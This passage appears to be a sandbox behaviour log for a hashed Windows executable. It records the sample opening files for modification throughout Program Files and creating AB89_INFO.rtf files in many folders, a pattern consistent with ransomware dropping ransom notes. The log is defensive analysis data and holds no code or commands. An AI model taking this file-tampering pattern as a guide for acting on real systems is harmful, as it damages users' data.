095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Sydney 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fil.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Cocos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\New_York 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Whitehorse 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\resources.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tehran 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pt-BR.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome.exe.sig 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bishkek 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_200_percent.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Rome 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santo_Domingo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\vi.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Auckland 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\UseSet.emf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belem 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST7MDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayenne 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\OutExport.potx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Halifax 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\setup.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Asuncion 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\accessibility.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Khandyga 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Easter 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\uninstall\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program 